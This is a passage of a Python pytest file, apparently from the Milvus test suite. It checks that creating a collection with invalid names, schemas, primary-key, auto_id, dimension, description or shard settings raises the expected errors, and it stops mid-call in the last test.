@pytest.mark.xfail(reason="exception not Milvus Exception")
def test_collection_empty_name(self):
"""
target: test collection with empty name
method: create collection with an empty name
expected: raise exception
"""
self._connect()
c_name = ""
error = {ct.err_code: 1, ct.err_msg: f'`collection_name` value is illegal'}
self.collection_wrap.init_collection(c_name, schema=default_schema, check_task=CheckTasks.err_res,
check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="exception not Milvus Exception")
@pytest.mark.parametrize("name", [[], 1, [1, "2", 3], (1,), {1: 1}, None])
def test_collection_illegal_name(self, name):
"""
target: test collection with illegal name
method: create collection with illegal name
expected: raise exception
"""
self._connect()
error = {ct.err_code: 1, ct.err_msg: "`collection_name` value {} is illegal".format(name)}
self.collection_wrap.init_collection(name, schema=default_schema, check_task=CheckTasks.err_res,
check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("name", ["12-s", "12 s", "(mn)", "中文", "%$#", "a".join("a" for i in range(256))])
def test_collection_invalid_name(self, name):
"""
target: test collection with invalid name
method: create collection with invalid name
expected: raise exception
"""
self._connect()
error = {ct.err_code: 1, ct.err_msg: "Invalid collection name: {}".format(name)}
self.collection_wrap.init_collection(name, schema=default_schema, check_task=CheckTasks.err_res,
check_items=error)
@pytest.mark.tags(CaseLabel.L0)
def test_collection_dup_name(self):
"""
target: test collection with dup name
method: create collection with dup name and none schema and data
expected: collection properties consistent
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
self.collection_wrap.init_collection(collection_w.name)
assert collection_w.name == self.collection_wrap.name
assert collection_w.schema == self.collection_wrap.schema
assert collection_w.num_entities == self.collection_wrap.num_entities
assert collection_w.name in self.utility_wrap.list_collections()[0]
@pytest.mark.tags(CaseLabel.L2)
def test_collection_dup_name_with_desc(self):
"""
target: test collection with dup name
method: 1. default schema with desc 2. dup name collection
expected: desc consistent
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(description=ct.collection_desc)
collection_w = self.init_collection_wrap(name=c_name, schema=schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
self.collection_wrap.init_collection(c_name,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
assert collection_w.description == self.collection_wrap.description
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_new_schema(self):
"""
target: test collection with dup name and new schema
method: 1.create collection with default schema
2. collection with dup name and new schema
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
fields = [cf.gen_int64_field(is_primary=True)]
schema = cf.gen_collection_schema(fields=fields)
error = {ct.err_code: 0, ct.err_msg: "The collection already exist, but the schema is not the same as the "
"schema passed in."}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_dup_name_new_primary(self):
"""
target: test collection with dup name and new primary_field schema
method: 1.collection with default schema
2. collection with same fields and new primary_field schema
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_field_one = cf.gen_int64_field()
int_field_two = cf.gen_int64_field(name="int2")
fields = [int_field_one, int_field_two, cf.gen_float_vec_field()]
schema = cf.gen_collection_schema(fields, primary_field=int_field_one.name)
collection_w = self.init_collection_wrap(name=c_name, schema=schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema,
exp_primary: int_field_one.name})
new_schema = cf.gen_collection_schema(fields, primary_field=int_field_two.name)
error = {ct.err_code: 0, ct.err_msg: "The collection already exist, but the schema is not the same as the "
"schema passed in."}
self.collection_wrap.init_collection(c_name, schema=new_schema, check_task=CheckTasks.err_res,
check_items=error)
assert collection_w.primary_field.name == int_field_one.name
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_new_dim(self):
"""
target: test collection with dup name and new dim schema
method: 1. default schema 2. schema with new dim
expected: raise exception
"""
self._connect()
new_dim = 120
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
schema = cf.gen_default_collection_schema()
new_fields = cf.gen_float_vec_field(dim=new_dim)
schema.fields[-1] = new_fields
error = {ct.err_code: 0, ct.err_msg: "The collection already exist, but the schema is not the same as the "
"schema passed in."}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
dim = collection_w.schema.fields[-1].params['dim']
assert dim == ct.default_dim
@pytest.mark.tags(CaseLabel.L2)
def test_collection_dup_name_invalid_schema_type(self, get_none_removed_invalid_strings):
"""
target: test collection with dup name and invalid schema
method: 1. default schema 2. invalid schema
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
error = {ct.err_code: 0, ct.err_msg: "Schema type must be schema.CollectionSchema"}
schema = get_none_removed_invalid_strings
self.collection_wrap.init_collection(collection_w.name, schema=schema,
check_task=CheckTasks.err_res, check_items=error)
assert collection_w.name == c_name
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_same_schema(self):
"""
target: test collection with dup name and same schema
method: dup name and same schema
        expected: two collection objects are available
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
self.collection_wrap.init_collection(name=c_name, schema=default_schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
assert collection_w.name == self.collection_wrap.name
@pytest.mark.tags(CaseLabel.L2)
def test_collection_none_schema(self):
"""
target: test collection with none schema
method: create collection with none schema
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "Should be passed into the schema"}
self.collection_wrap.init_collection(c_name, schema=None, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_invalid_type_schema(self, get_none_removed_invalid_strings):
"""
target: test collection with invalid schema
method: create collection with non-CollectionSchema type schema
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "Schema type must be schema.CollectionSchema"}
self.collection_wrap.init_collection(c_name, schema=get_none_removed_invalid_strings,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_invalid_type_fields(self, get_invalid_type_fields):
"""
target: test collection with invalid fields type, non-list
method: create collection schema with non-list invalid fields
expected: exception
"""
self._connect()
fields = get_invalid_type_fields
error = {ct.err_code: 0, ct.err_msg: "The fields of schema must be type list"}
self.collection_schema_wrap.init_collection_schema(fields=fields,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_with_unknown_type(self):
"""
target: test collection with unknown type
method: create with DataType.UNKNOWN
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "Field dtype must be of DataType"}
self.field_schema_wrap.init_field_schema(name="unknown", dtype=DataType.UNKNOWN,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="exception not Milvus Exception")
@pytest.mark.parametrize("name", [[], 1, (1,), {1: 1}, "12-s"])
def test_collection_invalid_type_field(self, name):
"""
target: test collection with non-string field name
method: use a non-string value (list, int, tuple, dict) or an invalid string as the field name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
field, _ = self.field_schema_wrap.init_field_schema(name=name, dtype=5, is_primary=True)
vec_field = cf.gen_float_vec_field()
schema = cf.gen_collection_schema(fields=[field, vec_field])
error = {ct.err_code: 1, ct.err_msg: "expected one of: bytes, unicode"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("name", ["12-s", "12 s", "(mn)", "中文", "%$#", "a".join("a" for i in range(256))])
def test_collection_invalid_field_name(self, name):
"""
target: test collection with invalid field name
method: invalid string name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
field, _ = self.field_schema_wrap.init_field_schema(name=name, dtype=DataType.INT64, is_primary=True)
vec_field = cf.gen_float_vec_field()
schema = cf.gen_collection_schema(fields=[field, vec_field])
error = {ct.err_code: 1, ct.err_msg: "Invalid field name"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="exception not Milvus Exception")
def test_collection_none_field_name(self):
"""
target: test field schema with None name
method: None field name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
field, _ = self.field_schema_wrap.init_field_schema(name=None, dtype=DataType.INT64, is_primary=True)
schema = cf.gen_collection_schema(fields=[field, cf.gen_float_vec_field()])
error = {ct.err_code: 1, ct.err_msg: "You should specify the name of field"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("dtype", [6, [[]], {}, (), "", "a"])
def test_collection_invalid_field_type(self, dtype):
"""
target: test collection with invalid field type
method: invalid DataType
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "Field dtype must be of DataType"}
self.field_schema_wrap.init_field_schema(name="test", dtype=dtype, is_primary=True,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="exception not Milvus Exception")
def test_collection_field_dtype_float_value(self):
"""
target: test field dtype given as a float value
method: create field with dtype=5.0 instead of a DataType
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
field, _ = self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=5.0,
is_primary=True)
schema = cf.gen_collection_schema(fields=[field, cf.gen_float_vec_field()])
error = {ct.err_code: 0, ct.err_msg: "Field type must be of DataType!"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_empty_fields(self):
"""
target: test collection with empty fields
method: create collection with fields = []
expected: exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema(fields=[], primary_field=ct.default_int64_field_name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_field(self):
"""
target: test collection with dup field name
method: Two FieldSchema have same name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
field_one = cf.gen_int64_field(is_primary=True)
field_two = cf.gen_int64_field()
schema = cf.gen_collection_schema(fields=[field_one, field_two, cf.gen_float_vec_field()])
error = {ct.err_code: 1, ct.err_msg: "duplicated field name"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
assert not self.utility_wrap.has_collection(c_name)[0]
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.parametrize("field", [cf.gen_float_vec_field(), cf.gen_binary_vec_field()])
def test_collection_only_vector_field(self, field):
"""
target: test collection just with vec field
method: create schema with only a vector field (float-vec or binary-vec)
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe"}
self.collection_schema_wrap.init_collection_schema([field], check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_multi_float_vectors(self):
"""
target: test collection with multi float vectors
method: create collection with two float-vec fields
expected: raise exception (not supported yet)
"""
# 1. connect
self._connect()
# 2. create collection with multiple vectors
c_name = cf.gen_unique_str(prefix)
fields = [cf.gen_int64_field(is_primary=True), cf.gen_float_field(),
cf.gen_float_vec_field(dim=default_dim), cf.gen_float_vec_field(name="tmp", dim=default_dim)]
schema = cf.gen_collection_schema(fields=fields)
err_msg = "multiple vector fields is not supported"
self.collection_wrap.init_collection(c_name, schema=schema,
check_task=CheckTasks.err_res,
check_items={"err_code": 1, "err_msg": err_msg})[0]
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip("https://github.com/milvus-io/milvus/issues/12680")
def test_collection_mix_vectors(self):
"""
target: test collection with mix vectors
method: create with float and binary vec
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
fields = [cf.gen_int64_field(is_primary=True), cf.gen_float_vec_field(), cf.gen_binary_vec_field()]
schema = cf.gen_collection_schema(fields=fields, auto_id=True)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L0)
def test_collection_without_vectors(self):
"""
target: test collection without vectors
method: create collection only with int field
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_collection_schema([cf.gen_int64_field(is_primary=True)])
error = {ct.err_code: 0, ct.err_msg: "No vector field is found."}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_without_primary_field(self):
"""
target: test collection without primary field
method: no primary field specified in collection schema and fields
expected: raise exception
"""
self._connect()
int_fields, _ = self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=DataType.INT64)
vec_fields, _ = self.field_schema_wrap.init_field_schema(name=ct.default_float_vec_field_name,
dtype=DataType.FLOAT_VECTOR, dim=ct.default_dim)
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema([int_fields, vec_fields],
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_is_primary_false(self):
"""
target: test collection with all is_primary false
method: set is_primary=False for all fields
expected: raise exception
"""
self._connect()
fields = [cf.gen_int64_field(is_primary=False), cf.gen_float_field(is_primary=False),
cf.gen_float_vec_field(is_primary=False)]
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema(fields, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("is_primary", ct.get_invalid_strs)
def test_collection_invalid_is_primary(self, is_primary):
"""
target: test collection with invalid primary
method: define field with is_primary=non-bool
expected: raise exception
"""
self._connect()
name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "Param is_primary must be bool type"}
self.field_schema_wrap.init_field_schema(name=name, dtype=DataType.INT64, is_primary=is_primary,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("primary_field", ["12-s", "12 s", "(mn)", "中文", "%$#", "a".join("a" for i in range(256))])
def test_collection_invalid_primary_field(self, primary_field):
"""
target: test collection with invalid primary_field
method: specify invalid string primary_field in collection schema
expected: raise exception
"""
self._connect()
fields = [cf.gen_int64_field(), cf.gen_float_vec_field()]
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema(fields=fields, primary_field=primary_field,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("primary_field", [[], 1, [1, "2", 3], (1,), {1: 1}, None])
def test_collection_non_string_primary_field(self, primary_field):
"""
target: test collection with non-string primary_field
method: primary_field type is not string
expected: raise exception
"""
self._connect()
fields = [cf.gen_int64_field(), cf.gen_float_vec_field()]
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema(fields, primary_field=primary_field,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_not_existed_primary_field(self):
"""
target: test collection with not exist primary field
method: specify not existed field as primary_field
expected: raise exception
"""
self._connect()
fake_field = cf.gen_unique_str()
fields = [cf.gen_int64_field(), cf.gen_float_vec_field()]
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema(fields, primary_field=fake_field,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L0)
def test_collection_primary_in_schema(self):
"""
target: test collection with primary field
method: specify primary field in CollectionSchema
expected: collection.primary_field is the specified field
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(primary_field=ct.default_int64_field_name)
self.collection_wrap.init_collection(c_name, schema=schema)
assert self.collection_wrap.primary_field.name == ct.default_int64_field_name
@pytest.mark.tags(CaseLabel.L0)
def test_collection_primary_in_field(self):
"""
target: test collection with primary field
method: specify primary field in FieldSchema
expected: collection.primary_field is the specified field
"""
self._connect()
fields = [cf.gen_int64_field(is_primary=True), cf.gen_float_field(), cf.gen_float_vec_field()]
schema, _ = self.collection_schema_wrap.init_collection_schema(fields)
self.collection_wrap.init_collection(cf.gen_unique_str(prefix), schema=schema)
assert self.collection_wrap.primary_field.name == ct.default_int64_field_name
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="exception not Milvus Exception")
def test_collection_unsupported_primary_field(self, get_unsupported_primary_field):
"""
target: test collection with unsupported primary field type
method: specify non-int64 as primary field
expected: raise exception
"""
self._connect()
field = get_unsupported_primary_field
vec_field = cf.gen_float_vec_field(name="vec")
error = {ct.err_code: 1, ct.err_msg: "Primary key type must be DataType.INT64."}
self.collection_schema_wrap.init_collection_schema(fields=[field, vec_field], primary_field=field.name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_multi_primary_fields(self):
"""
target: test collection with multi primary
method: collection with two primary fields
expected: raise exception
"""
self._connect()
int_field_one = cf.gen_int64_field(is_primary=True)
int_field_two = cf.gen_int64_field(name="int2", is_primary=True)
error = {ct.err_code: 0, ct.err_msg: "Primary key field can only be one."}
self.collection_schema_wrap.init_collection_schema(
fields=[int_field_one, int_field_two, cf.gen_float_vec_field()],
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_primary_inconsistent(self):
"""
target: test collection with different primary field setting
method: 1. set A field is_primary 2. set primary_field is B
expected: raise exception
"""
self._connect()
int_field_one = cf.gen_int64_field(is_primary=True)
int_field_two = cf.gen_int64_field(name="int2")
fields = [int_field_one, int_field_two, cf.gen_float_vec_field()]
error = {ct.err_code: 0, ct.err_msg: "Primary key field can only be one"}
self.collection_schema_wrap.init_collection_schema(fields, primary_field=int_field_two.name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_primary_consistent(self):
"""
target: test collection with both collection schema and field schema
method: 1. set A field is_primary 2.set primary_field is A
expected: verify primary field
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_field_one = cf.gen_int64_field(is_primary=True)
schema = cf.gen_collection_schema(fields=[int_field_one, cf.gen_float_vec_field()],
primary_field=int_field_one.name)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.parametrize("auto_id", [True, False])
def test_collection_auto_id_in_field_schema(self, auto_id):
"""
target: test collection with auto_id in field schema
method: specify auto_id True in field schema
expected: verify schema's auto_id
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_field = cf.gen_int64_field(is_primary=True, auto_id=auto_id)
vec_field = cf.gen_float_vec_field(name='vec')
schema, _ = self.collection_schema_wrap.init_collection_schema([int_field, vec_field])
assert schema.auto_id == auto_id
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.parametrize("auto_id", [True, False])
def test_collection_auto_id_in_collection_schema(self, auto_id):
"""
target: test collection with auto_id in collection schema
method: specify auto_id True in collection schema
expected: verify schema auto_id and collection schema
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_field = cf.gen_int64_field(is_primary=True)
vec_field = cf.gen_float_vec_field(name='vec')
schema, _ = self.collection_schema_wrap.init_collection_schema([int_field, vec_field], auto_id=auto_id)
assert schema.auto_id == auto_id
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L2)
def test_collection_auto_id_non_primary_field(self):
"""
target: test collection set auto_id in non-primary field
method: set auto_id=True in non-primary field
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "auto_id can only be specified on the primary key field"}
self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=DataType.INT64, auto_id=True,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_auto_id_false_non_primary(self):
"""
target: test collection set auto_id in non-primary field
method: set auto_id=False in non-primary field
expected: verify schema auto_id is False
"""
self._connect()
int_field_one = cf.gen_int64_field(is_primary=True)
int_field_two = cf.gen_int64_field(name='int2', auto_id=False)
fields = [int_field_one, int_field_two, cf.gen_float_vec_field()]
schema, _ = self.collection_schema_wrap.init_collection_schema(fields)
assert not schema.auto_id
@pytest.mark.tags(CaseLabel.L2)
def test_collection_auto_id_inconsistent(self):
"""
target: test collection auto_id with both collection schema and field schema
method: 1.set primary field auto_id=True in field schema 2.set auto_id=False in collection schema
expected: raise exception
"""
self._connect()
int_field = cf.gen_int64_field(is_primary=True, auto_id=True)
vec_field = cf.gen_float_vec_field(name='vec')
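# field-level auto_id=True conflicts with the collection-level auto_id=False passed below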
error = {ct.err_code: 0, ct.err_msg: "The auto_id of the collection is inconsistent with "
"the auto_id of the primary key field"}
self.collection_schema_wrap.init_collection_schema([int_field, vec_field], auto_id=False,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("auto_id", [True, False])
def test_collection_auto_id_consistent(self, auto_id):
"""
target: test collection auto_id with both collection schema and field schema
method: set auto_id=True/False both field and schema
expected: verify auto_id
"""
self._connect()
int_field = cf.gen_int64_field(is_primary=True, auto_id=auto_id)
vec_field = cf.gen_float_vec_field(name='vec')
schema, _ = self.collection_schema_wrap.init_collection_schema([int_field, vec_field], auto_id=auto_id)
assert schema.auto_id == auto_id
@pytest.mark.tags(CaseLabel.L2)
def test_collection_auto_id_none_in_field(self):
"""
target: test collection with auto_id is None
method: set auto_id=None
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "Param auto_id must be bool type"}
self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=DataType.INT64,
is_primary=True,
auto_id=None, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("auto_id", ct.get_invalid_strs)
def test_collection_invalid_auto_id(self, auto_id):
"""
target: test collection with invalid auto_id
method: define field with auto_id=non-bool
expected: raise exception
"""
self._connect()
int_field = cf.gen_int64_field(is_primary=True)
vec_field = cf.gen_float_vec_field(name='vec')
error = {ct.err_code: 0, ct.err_msg: "Param auto_id must be bool type"}
self.collection_schema_wrap.init_collection_schema([int_field, vec_field], auto_id=auto_id,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_multi_fields_auto_id(self):
"""
target: test collection auto_id with multi fields
method: specify auto_id=True for multi int64 fields
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "auto_id can only be specified on the primary key field"}
cf.gen_int64_field(is_primary=True, auto_id=True)
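# the primary key field above may carry auto_id=True; requesting auto_id on the extra non-primary int field below is expected to fail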
self.field_schema_wrap.init_field_schema(name="int", dtype=DataType.INT64, auto_id=True,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("dtype", [DataType.FLOAT_VECTOR, DataType.BINARY_VECTOR])
def test_collection_vector_without_dim(self, dtype):
"""
target: test collection without dimension
method: define vector field without dim
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
float_vec_field, _ = self.field_schema_wrap.init_field_schema(name="vec", dtype=dtype)
schema = cf.gen_collection_schema(fields=[cf.gen_int64_field(is_primary=True), float_vec_field])
error = {ct.err_code: 1, ct.err_msg: "dimension is not defined in field type params"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="exception not Milvus Exception")
def test_collection_vector_invalid_dim(self, get_invalid_dim):
"""
target: test collection with invalid dimension
method: define float-vec field with invalid dimension
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
float_vec_field = cf.gen_float_vec_field(dim=get_invalid_dim)
schema = cf.gen_collection_schema(fields=[cf.gen_int64_field(is_primary=True), float_vec_field])
error = {ct.err_code: 1, ct.err_msg: f'invalid dim: {get_invalid_dim}'}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("dim", [-1, 0, 32769])
def test_collection_vector_out_bounds_dim(self, dim):
"""
target: test collection with out of bounds dim
method: invalid dim -1, 0 and 32769
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
float_vec_field = cf.gen_float_vec_field(dim=dim)
schema = cf.gen_collection_schema(fields=[cf.gen_int64_field(is_primary=True), float_vec_field])
error = {ct.err_code: 1, ct.err_msg: "invalid dimension: {}. should be in range 1 ~ 32768".format(dim)}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_non_vector_field_dim(self):
"""
target: test collection with dim for non-vector field
method: define int64 field with dim
expected: no exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_field, _ = self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=DataType.INT64,
dim=ct.default_dim)
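# the dim param on a non-vector field is expected to be ignored rather than rejected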
float_vec_field = cf.gen_float_vec_field()
schema = cf.gen_collection_schema(fields=[int_field, float_vec_field],
primary_field=ct.default_int64_field_name)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L1)
def test_collection_desc(self):
"""
target: test collection with description
method: create with description
expected: assert default description
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(description=ct.collection_desc)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="exception not Milvus Exception")
def test_collection_none_desc(self):
"""
target: test collection with none description
method: create with none description
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(description=None)
error = {ct.err_code: 1, ct.err_msg: "None has type NoneType, but expected one of: bytes, unicode"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_collection_long_desc(self):
"""
target: test collection with long desc
method: create with long desc
expected: create collection successfully
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
desc = "a".join("a" for _ in range(256))
schema = cf.gen_default_collection_schema(description=desc)
self.collection_wrap.init_collection(c_name, schema=schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L0)
def test_collection_binary(self):
"""
target: test collection with binary-vec
method: create collection with binary field
expected: assert binary field
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=default_binary_schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_binary_schema})
assert c_name in self.utility_wrap.list_collections()[0]
@pytest.mark.tags(CaseLabel.L0)
def test_collection_shards_num_with_default_value(self):
"""
target: test collection with default shards_num
method: create collection with default shards_num
expected: no exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=default_schema, shards_num=default_shards_num,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_shards_num: default_shards_num})
assert c_name in self.utility_wrap.list_collections()[0]
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.parametrize("shards_num", [-256, 0, 10, 256])
def test_collection_shards_num_with_not_default_value(self, shards_num):
"""
target: test collection with non-default shards_num
method: create collection with non-default shards_num
expected: no exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=default_schema, shards_num=shards_num,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_shards_num: shards_num})
assert c_name in self.utility_wrap.list_collections()[0]
@pytest.mark.tags(CaseLabel.L2)
def test_collection_shards_num_with_error_type(self):
"""
target: test collection with wrong-typed shards_num
method: create collection with a string shards_num
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
error_type_shards_num = "2"  # supposed to be int rather than str
error = {ct.err_code: -1, ct.err_msg: "expected one of: int, long"}
self.collection_wrap.init_collection(c_name, schema=default_schema, shards_num=error_type_shards_num,
check_task=CheckTasks.err_res,
